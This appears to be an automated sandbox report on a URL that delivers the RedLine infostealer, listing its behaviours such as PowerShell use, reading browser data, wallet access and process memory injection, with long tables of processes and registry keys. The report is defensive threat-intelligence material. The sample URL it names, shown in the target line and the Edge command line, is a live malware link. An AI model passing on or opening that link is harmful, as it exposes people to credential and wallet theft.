Malware Analysis Report

2025-03-15 04:50

Sample ID 240714-sdrmvavgjm
Target https://goo.su/xQHo
Tags
redline 6951125327 discovery execution infostealer spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://goo.su/xQHo was found to be: Known bad.

Malicious Activity Summary

redline 6951125327 discovery execution infostealer spyware stealer

RedLine payload

RedLine

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-14 15:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 15:00

Reported

2024-07-14 15:03

Platform

win10v2004-20240709-en

Max time kernel

144s

Max time network

148s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://goo.su/xQHo

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1920 wrote to memory of 3420 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 3420 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 2736 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 4824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1920 wrote to memory of 4824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
